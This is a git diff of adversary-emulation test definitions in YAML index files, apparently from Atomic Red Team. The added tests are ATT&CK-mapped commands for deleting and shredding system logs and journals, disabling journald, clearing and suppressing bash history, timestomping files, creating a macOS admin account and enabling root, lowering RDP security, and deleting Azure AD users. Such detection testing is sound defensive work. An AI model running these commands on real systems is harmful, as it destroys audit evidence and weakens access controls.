+    - name: Azure AD - Delete user via Azure CLI
+      auto_generated_guid: c955c1c7-3145-4a22-af2d-63eea0d967f0
+      description: Deletes a user in Azure AD. Adversaries may interrupt availability
+        of system and network resources by inhibiting access to accounts utilized
+        by legitimate users. Accounts may be deleted, locked, or manipulated (excluding
+        changed credentials) to remove access to accounts.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        userprincipalname:
+          description: User principal name (UPN) for the Azure user being deleted
+          type: String
+          default: atomicredteam@yourdomain.com
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Check if Azure CLI is installed and install manually
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI manually
+          https://aka.ms/installazurecliwindows"
+      - description: Check if Azure CLI is installed and install via PowerShell
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI $ProgressPreference
+          = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows
+          -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I
+          AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+      - description: Update the userprincipalname to meet your requirements
+        prereq_command: Update the input arguments so the userprincipalname value
+          is accurate for your environment
+        get_prereq_command: echo "Update the input arguments in the .yaml file so
+          that the userprincipalname value is accurate for your environment"
+      executor:
+        command: |-
+          az login
+          $userprincipalname = "#{userprincipalname}"
+          az ad user delete --id $userprincipalname
+        cleanup_command: N/A
+        name: powershell
   T1486:
     technique:
       x_mitre_platforms:

atomics/Indexes/containers-index.yaml

@@ -7800,7 +7800,45 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - root
-    atomic_tests: []
+      identifier: T1612
+    atomic_tests:
+    - name: Build Image On Host
+      auto_generated_guid: 2db30061-589d-409b-b125-7b473944f9b3
+      description: Adversaries may build a container image directly on a host to bypass
+        defenses that monitor for the retrieval of malicious images from a public
+        registry. An adversary may take advantage of that build API to build a custom
+        image on the host that includes malware downloaded from their C2 server, and
+        then they then may utilize Deploy Container using that custom image.
+      supported_platforms:
+      - containers
+      dependency_executor_name: sh
+      dependencies:
+      - description: Verify docker is installed.
+        prereq_command: 'which docker
+
+          '
+        get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
+          Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
+          ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
+          echo "Docker installed"; fi
+
+          '
+      - description: Verify docker service is running.
+        prereq_command: 'sudo systemctl status docker  --no-pager
+
+          '
+        get_prereq_command: 'sudo systemctl start docker
+
+          '
+      executor:
+        command: |-
+          docker build -t t1612  $PathtoAtomicsFolder/T1612/src/
+          docker run --name t1612_container  -d -t t1612
+          docker exec t1612_container ./test.sh
+        cleanup_command: |-
+          docker stop t1612_container
+          docker rmi -f t1612
+        name: sh
   T1055.002:
     technique:
       x_mitre_platforms:
@@ -26814,6 +26852,10 @@ execution:
           description: Command to run
           type: string
           default: uname
+        path:
+          description: Path to busybox.yaml file
+          type: string
+          default: "$PathtoAtomicsFolder/T1609/src/busybox.yaml"
       dependencies:
       - description: 'kubectl must be installed
 
@@ -26826,7 +26868,9 @@ execution:
           '
       executor:
         command: |
-          kubectl create -f src/busybox.yaml -n #{namespace}
+          kubectl create -f #{path} -n #{namespace}
+          # wait 3 seconds for the instance to come up
+          sleep 3
           kubectl exec -n #{namespace} busybox -- #{command}
         cleanup_command: 'kubectl delete pod busybox -n #{namespace}
 
@@ -26845,11 +26889,6 @@ execution:
         '
       supported_platforms:
       - containers
-      input_arguments:
-        command:
-          description: Command to run
-          type: string
-          default: cat
       dependencies:
       - description: 'docker must be installed
 
@@ -27865,6 +27904,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:

atomics/Indexes/google-workspace-index.yaml

@@ -7766,6 +7766,7 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - root
+      identifier: T1612
     atomic_tests: []
   T1055.002:
     technique:
@@ -27522,6 +27523,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:

atomics/Indexes/iaas-index.yaml

@@ -7766,6 +7766,7 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - root
+      identifier: T1612
     atomic_tests: []
   T1055.002:
     technique:
@@ -27418,6 +27419,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:

atomics/Indexes/iaas_aws-index.yaml

@@ -7766,6 +7766,7 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - root
+      identifier: T1612
     atomic_tests: []
   T1055.002:
     technique:
@@ -27561,6 +27562,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:

atomics/Indexes/iaas_azure-index.yaml

@@ -7766,6 +7766,7 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - root
+      identifier: T1612
     atomic_tests: []
   T1055.002:
     technique:
@@ -27596,6 +27597,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:
@@ -36443,7 +36445,8 @@ persistence:
           type: string
           default: p4sswd
         user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
           type: string
           default: SuperUser
         role_name:
@@ -36472,7 +36475,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzAccount -Credential $Credential
 
-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
           if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -36487,7 +36490,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzAccount -Credential $Credential -ErrorAction Ignore
 
-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
           if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }

atomics/Indexes/iaas_gcp-index.yaml

@@ -7766,6 +7766,7 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - root
+      identifier: T1612
     atomic_tests: []
   T1055.002:
     technique:
@@ -27522,6 +27523,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:

atomics/Indexes/index.yaml

@@ -3694,9 +3694,9 @@ defense-evasion:
         command: |
           sc.exe create #{service_name} binPath= "#{executable_command}"
           sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
-        cleanup_command: 'sc.exe delete #{service_name}
-
-          '
+        cleanup_command: |
+          sc sdset #{service_name} "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
+          sc.exe delete #{service_name}
         name: command_prompt
         elevation_required: true
   T1484.002:
@@ -4292,6 +4292,179 @@ defense-evasion:
           sudo rm -rf /private/var/audit/*
         name: sh
         elevation_required: true
+    - name: Delete log files using built-in log utility
+      auto_generated_guid: 653d39cd-bae7-499a-898c-9fb96b8b5cd1
+      description: 'This test deletes main log datastore, inflight log data, time-to-live
+        data(TTL), fault and error content
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: |
+          sudo log erase --all
+          sudo log erase --ttl #Deletes only time-to-live log content
+          sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
+        name: sh
+        elevation_required: true
+    - name: Truncate system log files via truncate utility
+      auto_generated_guid: 6290f8a8-8ee9-4661-b9cf-390031bf6973
+      description: 'This test truncates the system log files using the truncate utility
+        with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying
+        the file content
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: "sudo truncate -s 0 /var/log/system.log #size parameter shorthand\nsudo
+          truncate --size=0 /var/log/system.log #size parameter \n"
+        name: sh
+        elevation_required: true
+    - name: Delete log files via cat utility by appending /dev/null or /dev/zero
+      auto_generated_guid: c23bdb88-928d-493e-b46d-df2906a50941
+      description: 'The first sub-test truncates the log file to zero bytes via /dev/null
+        and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero,
+        using cat utility
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: |
+          sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
+          sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
+        name: sh
+        elevation_required: true
+    - name: System log file deletion via find utility
+      auto_generated_guid: bc8eeb4a-cc3e-45ec-aa6e-41e973da2558
+      description: 'This test finds and deletes the system log files within /var/log/
+        directory using various executions(rm, shred, unlink)
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: |
+          sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
+          sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
+          sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
+        name: sh
+        elevation_required: true
+    - name: Overwrite macOS system log via echo utility
+      auto_generated_guid: '0208ea60-98f1-4e8c-8052-930dce8f742c'
+      description: 'This test overwrites the contents of system log file with an empty
+        string using echo utility
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: 'sudo echo '''' > /var/log/system.log
+
+          '
+        name: sh
+        elevation_required: true
+    - name: Real-time system log clearance/deletion
+      auto_generated_guid: 848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c
+      description: 'This test reads real-time system log file and writes empty string
+        to it, thus clearing the log file without tampering with the logging process
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: 'sudo log -f /var/log/system.log | : > /var/log/system.log
+
+          '
+        name: sh
+        elevation_required: true
+    - name: Delete system log files via unlink utility
+      auto_generated_guid: 03013b4b-01db-437d-909b-1fdaa5010ee8
+      description: 'This test deletes the system log file using unlink utility
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: 'sudo unlink /var/log/system.log
+
+          '
+        name: sh
+        elevation_required: true
+    - name: Delete system log files using shred utility
+      auto_generated_guid: 86f0e4d5-3ca7-45fb-829d-4eda32b232bb
+      description: 'This test overwrites the contents of the log file with zero bytes(-z)
+        using three passes(-n 3) of data, and then delete the file(-u) securely
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: 'sudo shred -u -z -n 3 /var/log/system.log
+
+          '
+        name: sh
+        elevation_required: true
+    - name: Delete system log files using srm utility
+      auto_generated_guid: b0768a5e-0f32-4e75-ae5b-d036edcf96b6
+      description: |
+        This test securely deletes the system log files individually and recursively using the srm utility.
+        Install srm using Homebrew with the command: brew install khell/homebrew-srm/srm
+        Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
+      supported_platforms:
+      - macos
+      executor:
+        command: |
+          sudo srm /var/log/system.log #system log file deletion
+          sudo srm -r /var/log/ #recursive deletion of log files
+        name: sh
+        elevation_required: true
+    - name: Delete system log files using OSAScript
+      auto_generated_guid: 810a465f-cd4f-47bc-b43e-d2de3b033ecc
+      description: 'This test deletes the system log file using osascript via "do
+        shell script"(sh/bash by default) which in-turn spawns rm utility, requires
+        admin privileges
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: 'osascript -e ''do shell script "rm /var/log/system.log" with administrator
+          privileges''
+
+          '
+        name: sh
+        elevation_required: true
+    - name: Delete system log files using Applescript
+      auto_generated_guid: e62f8694-cbc7-468f-862c-b10cd07e1757
+      description: |
+        This test deletes the system log file using applescript using osascript via Finder application
+        Note: The user may be prompted to grant access to the Finder application before the command can be executed successfully as part of TCC(Transparency, Consent, and Control) Framework.
+        Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
+      supported_platforms:
+      - macos
+      executor:
+        command: 'osascript -e ''tell application "Finder" to delete POSIX file "/var/log/system.log"''
+
+          '
+        name: sh
+        elevation_required: true
+    - name: Delete system journal logs via rm and journalctl utilities
+      auto_generated_guid: ca50dd85-81ff-48ca-92e1-61f119cb1dcf
+      description: 'The first sub-test deletes the journal files using rm utility
+        in the "/var/log/journal/" directory and the second sub-test clears the journal
+        by modifiying time period of logs that should be retained to zero.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: |
+          sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
+          sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
+        name: sh
+        elevation_required: true
     - name: Overwrite Linux Mail Spool
       auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4
       description: 'This test overwrites the Linux mail spool of a specified user.
@@ -6819,10 +6992,6 @@ defense-evasion:
           description: Encoded
           type: string
           default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
-        zsh_encoded:
-          description: Encoded
-          type: string
-          default: IyEvYmluL3pzaAplY2hvICJodHRwczovL3d3dy55b3V0dWJlLmNvbS9AYXRvbWljc29uYWZyaWRheSBGVFciCg==
         fish_encoded:
           description: Encoded
           type: string
@@ -6937,6 +7106,42 @@ defense-evasion:
           '
         name: command_prompt
         elevation_required: true
+    - name: Disable journal logging via systemctl utility
+      auto_generated_guid: c3a377f9-1203-4454-aa35-9d391d34768f
+      description: 'The atomic test disables the journal logging using built-in systemctl
+        utility
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'sudo systemctl stop systemd-journald #disables journal logging
+
+          '
+        cleanup_command: |
+          sudo systemctl start systemd-journald #starts journal service
+          sudo systemctl enable systemd-journald #starts journal service automatically at boot time
+        name: sh
+        elevation_required: true
+    - name: Disable journal logging via sed utility
+      auto_generated_guid: 12e5551c-8d5c-408e-b3e4-63f53b03379f
+      description: 'The atomic test disables the journal logging by searching and
+        replacing the "Storage" parameter to "none" within the journald.conf file,
+        thus any new journal entries will only be temporarily available in memory
+        and not written to disk
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'sudo sed -i ''s/Storage=auto/Storage=none/'' /etc/systemd/journald.conf
+
+          '
+        cleanup_command: |
+          sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
+          sudo systemctl restart systemd-journald #restart the journal service
+        name: sh
+        elevation_required: true
   T1055.003:
     technique:
       x_mitre_platforms:
@@ -8043,10 +8248,23 @@ defense-evasion:
         target_filename:
           description: Path of file that we are going to stomp on last access time
           type: path
-          default: "/opt/filename"
+          default: "/tmp/T1070.006-access.txt"
+      dependencies:
+      - description: 'The file must exist in order to be timestomped
+
+          '
+        prereq_command: 'test -e #{target_filename} && exit 0 || exit 1
+
+          '
+        get_prereq_command: 'echo ''T1070.006 file access timestomp test'' > #{target_filename}
+
+          '
       executor:
         command: 'touch -a -t 197001010000.00 #{target_filename}
 
+          '
+        cleanup_command: 'rm -f #{target_filename}
+
           '
         name: sh
     - name: Set a file's modification timestamp
@@ -8061,10 +8279,24 @@ defense-evasion:
         target_filename:
           description: Path of file that we are going to stomp on last access time
           type: path
-          default: "/opt/filename"
+          default: "/tmp/T1070.006-modification.txt"
+      dependencies:
+      - description: 'The file must exist in order to be timestomped
+
+          '
+        prereq_command: 'test -e #{target_filename} && exit 0 || exit 1
+
+          '
+        get_prereq_command: 'echo ''T1070.006 file modification timestomp test'' >
+          #{target_filename}
+
+          '
       executor:
         command: 'touch -m -t 197001010000.00 #{target_filename}
 
+          '
+        cleanup_command: 'rm -f #{target_filename}
+
           '
         name: sh
     - name: Set a file's creation timestamp
@@ -8081,14 +8313,18 @@ defense-evasion:
         target_filename:
           description: Path of file that we are going to stomp on last access time
           type: path
-          default: "/opt/filename"
+          default: "/tmp/T1070.006-creation.txt"
       executor:
+        elevation_required: true
         command: |
-          NOW=$(date)
-          date -s "1970-01-01 00:00:00"
+          NOW=$(date +%m%d%H%M%Y)
+          date 010100001971
           touch #{target_filename}
-          date -s "$NOW"
+          date "$NOW"
           stat #{target_filename}
+        cleanup_command: 'rm -f #{target_filename}
+
+          '
         name: sh
     - name: Modify file timestamps using reference file
       auto_generated_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50
@@ -8103,14 +8339,27 @@ defense-evasion:
         target_file_path:
           description: Path of file to modify timestamps of
           type: path
-          default: "/opt/filename"
+          default: "/tmp/T1070.006-reference.txt"
         reference_file_path:
           description: Path of reference file to read timestamps from
           type: path
           default: "/bin/sh"
+      dependencies:
+      - description: 'The file must exist in order to be timestomped
+
+          '
+        prereq_command: 'test -e #{target_file_path} && exit 0 || exit 1
+
+          '
+        get_prereq_command: 'echo ''T1070.006 reference file timestomp test'' > #{target_file_path}
+
+          '
       executor:
         command: 'touch -acmr #{reference_file_path} #{target_file_path}
 
+          '
+        cleanup_command: 'rm -f #{target_file_path}
+
           '
         name: sh
     - name: Windows - Modify file creation timestamp with PowerShell
@@ -11244,6 +11493,24 @@ defense-evasion:
           Viewer" /v MicrosoftRedirectionProgram /t REG_EXPAND_SZ /f
         name: command_prompt
         elevation_required: true
+    - name: Enabling Remote Desktop Protocol via Remote Registry
+      auto_generated_guid: e3ad8e83-3089-49ff-817f-e52f8c948090
+      description: 'Enabling RDP through remote registry.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp"
+          /v SecurityLayer /t REG_DWORD /d 0 /f
+
+          '
+        cleanup_command: 'reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal
+          Server\Winstations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 2 /f
+
+          '
+        name: command_prompt
+        elevation_required: true
   T1574.008:
     technique:
       x_mitre_platforms:
@@ -11456,7 +11723,7 @@ defense-evasion:
     - name: Pad Binary to Change Hash - Linux/macOS dd
       auto_generated_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a
       description: |
-        Uses dd to add a zero to the binary to change the hash.
+        Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash.
 
         Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
       supported_platforms:
@@ -11479,7 +11746,41 @@ defense-evasion:
 
           '
       executor:
-        command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
+        command: |
+          dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes
+          dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data
+          dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data
+        cleanup_command: 'rm #{file_to_pad}
+
+          '
+        name: sh
+    - name: Pad Binary to Change Hash using truncate command - Linux/macOS
+      auto_generated_guid: e22a9e89-69c7-410f-a473-e6c212cd2292
+      description: |
+        Uses truncate to add a byte to the binary to change the hash.
+
+        Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        file_to_pad:
+          description: Path of binary to be padded
+          type: path
+          default: "/tmp/evil-binary"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'The binary must exist on disk at specified location (#{file_to_pad})
+
+          '
+        prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
+
+          '
+        get_prereq_command: 'cp /bin/ls #{file_to_pad}
+
+          '
+      executor:
+        command: 'truncate -s +1 #{file_to_pad} #adds a byte to the file size
 
           '
         cleanup_command: 'rm #{file_to_pad}
@@ -14967,7 +15268,45 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - root
-    atomic_tests: []
+      identifier: T1612
+    atomic_tests:
+    - name: Build Image On Host
+      auto_generated_guid: 2db30061-589d-409b-b125-7b473944f9b3
+      description: Adversaries may build a container image directly on a host to bypass
+        defenses that monitor for the retrieval of malicious images from a public
+        registry. An adversary may take advantage of that build API to build a custom
+        image on the host that includes malware downloaded from their C2 server, and
+        then they then may utilize Deploy Container using that custom image.
+      supported_platforms:
+      - containers
+      dependency_executor_name: sh
+      dependencies:
+      - description: Verify docker is installed.
+        prereq_command: 'which docker
+
+          '
+        get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
+          Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
+          ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
+          echo "Docker installed"; fi
+
+          '
+      - description: Verify docker service is running.
+        prereq_command: 'sudo systemctl status docker  --no-pager
+
+          '
+        get_prereq_command: 'sudo systemctl start docker
+
+          '
+      executor:
+        command: |-
+          docker build -t t1612  $PathtoAtomicsFolder/T1612/src/
+          docker run --name t1612_container  -d -t t1612
+          docker exec t1612_container ./test.sh
+        cleanup_command: |-
+          docker stop t1612_container
+          docker rmi -f t1612
+        name: sh
   T1055.002:
     technique:
       x_mitre_platforms:
@@ -16266,6 +16605,115 @@ defense-evasion:
           3. ls
           4. whoami > recon.txt
         name: manual
+    - name: Clear bash history
+      auto_generated_guid: 878794f7-c511-4199-a950-8c28b3ed8e5b
+      description: "An attacker may clear the bash history cache and the history file
+        as their last act before logging off to remove the record of their command
+        line activities. \n\nIn this test we use the $HISTFILE variable throughout
+        to 1. confirms the $HISTFILE variable is set 2. echo \"\" into it 3..5 confirm
+        the file is empty 6 clear the history cache 7. confirm the history cache is
+        empty. This is when the attacker would logoff.\n"
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: "cp $HISTFILE $HISTFILE.OLD\nif ((${#HISTFILE[@]})); then echo $HISTFILE;
+          fi\necho \"\" > $HISTFILE\nif [ $(wc -c <$HISTFILE) -gt 1 ]; then echo \"$HISTFILE
+          is larger than 1k\"; fi\nls -la $HISTFILE \ncat $HISTFILE\nhistory -c \nif
+          [ $(history |wc -l) -eq 1 ]; then echo \"History cache cleared\"; fi\n"
+        cleanup_command: "mv -f $HISTFILE.OLD $HISTFILE \n"
+    - name: Setting the HISTCONTROL environment variable
+      auto_generated_guid: 10ab786a-028e-4465-96f6-9e83ca6c5f24
+      description: "An attacker may exploit the space before a command (e.g. \" ls\")
+        or the duplicate command suppression feature in Bash history to prevent their
+        commands from being recorded in the history file or to obscure the order of
+        commands used. \n\nIn this test we 1. sets $HISTCONTROL to ignoreboth 2. clears
+        the history cache 3. executes ls -la with a space in-front of it 4. confirms
+        that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups
+        6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms
+        that their is only one command in history\n"
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: "TEST=$(echo $HISTCONTROL)\nif [ \"$HISTCONTROL\" != \"ignoreboth\"
+          ]; then export HISTCONTROL=\"ignoreboth\"; fi\nhistory -c \nls -la $HISTFILE
+          # \" ls -la $HISTFILE\"\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls
+          -la is not in history cache\"; fi\n# -> ls -la is not in history cache\nif
+          [ \"$HISTCONTROL\" != \"erasedups\" ]; then export HISTCONTROL=\"erasedups\";
+          fi\nhistory -c \nls -la $HISTFILE\nls -la $HISTFILE\nls -la $HISTFILE\nif
+          [ $(history |wc -l) -eq 2 ]; then echo \"Their is only one entry for ls
+          -la $HISTFILE\"; fi\n"
+        cleanup_command: 'export HISTCONTROL=$(echo $TEST)
+
+          '
+    - name: Setting the HISTFILESIZE environment variable
+      auto_generated_guid: 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
+      description: |
+        An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
+
+        Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          TEST=$(echo $HISTFILESIZE)
+          echo $HISTFILESIZE
+          export HISTFILESIZE=0
+          if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
+          # -> $HISTFILESIZE is zero
+        cleanup_command: 'export HISTCONTROL=$(echo $TEST)
+
+          '
+    - name: Setting the HISTFILE environment variable
+      auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
+      description: |
+        An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
+
+        Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          TEST=$(echo $HISTFILE)
+          echo $HISTFILE
+          export HISTFILE="/dev/null"
+          if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
+          # -> $HISTFILE is /dev/null
+        cleanup_command: 'export HISTFILE=$(echo $TEST)
+
+          '
+    - name: Setting the HISTIGNORE environment variable
+      auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
+      description: "An Adversary may take advantage of the HISTIGNORE environment
+        variable either to ignore particular commands or all commands. \n\nIn this
+        test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this
+        history cache 3..4 execute ls commands 5. confirm that the ls commands are
+        not in the history cache 6. unset HISTIGNORE variable 7.. same again, but
+        ignoring ALL commands.\n"
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: "if ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\";
+          else export HISTIGNORE='ls*:rm*:ssh*'; echo \"\\$HISTIGNORE = $HISTIGNORE\";
+          fi\n# -> $HISTIGNORE = ls*:rm*:ssh*\nhistory -c \nls -la $HISTFILE\nls -la
+          ~/.bash_logout\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls commands
+          are not in history\"; fi\n# -> ls commands are not in history\nunset HISTIGNORE\n\nif
+          ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\"; else export
+          HISTIGNORE='*'; echo \"\\$HISTIGNORE = $HISTIGNORE\"; fi\n# -> $HISTIGNORE
+          = *\nhistory -c \nwhoami\ngroups\nif [ $(history |wc -l) -eq 0 ]; then echo
+          \"History cache is empty\"; fi\n# -> History cache is empty\n"
+        cleanup_command: 'unset HISTIGNORE
+
+          '
   T1497.002:
     technique:
       x_mitre_platforms:
@@ -23726,13 +24174,31 @@ defense-evasion:
       - linux
       - macos
       input_arguments:
+        parent_folder:
+          description: Path of parent folder
+          type: path
+          default: "/tmp/victim-files/"
         file_to_delete:
           description: Path of file to delete
           type: path
-          default: "/tmp/victim-files/a"
+          default: "/tmp/victim-files/T1070.004-test.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'The file must exist in order to be deleted
+
+          '
+        prereq_command: 'test -e #{file_to_delete} && exit 0 || exit 1
+
+          '
+        get_prereq_command: 'mkdir -p #{parent_folder} && touch #{file_to_delete}
+
+          '
       executor:
         command: 'rm -f #{file_to_delete}
 
+          '
+        cleanup_command: 'rm -rf #{parent_folder}
+
           '
         name: sh
     - name: Delete an entire folder - Linux/macOS
@@ -23748,7 +24214,18 @@ defense-evasion:
         folder_to_delete:
           description: Path of folder to delete
           type: path
-          default: "/tmp/victim-files"
+          default: "/tmp/victim-folder"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'The folder must exist in order to be deleted
+
+          '
+        prereq_command: 'test -e #{folder_to_delete} && exit 0 || exit 1
+
+          '
+        get_prereq_command: 'mkdir -p #{folder_to_delete}
+
+          '
       executor:
         command: 'rm -rf #{folder_to_delete}
 
@@ -27196,6 +27673,45 @@ defense-evasion:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
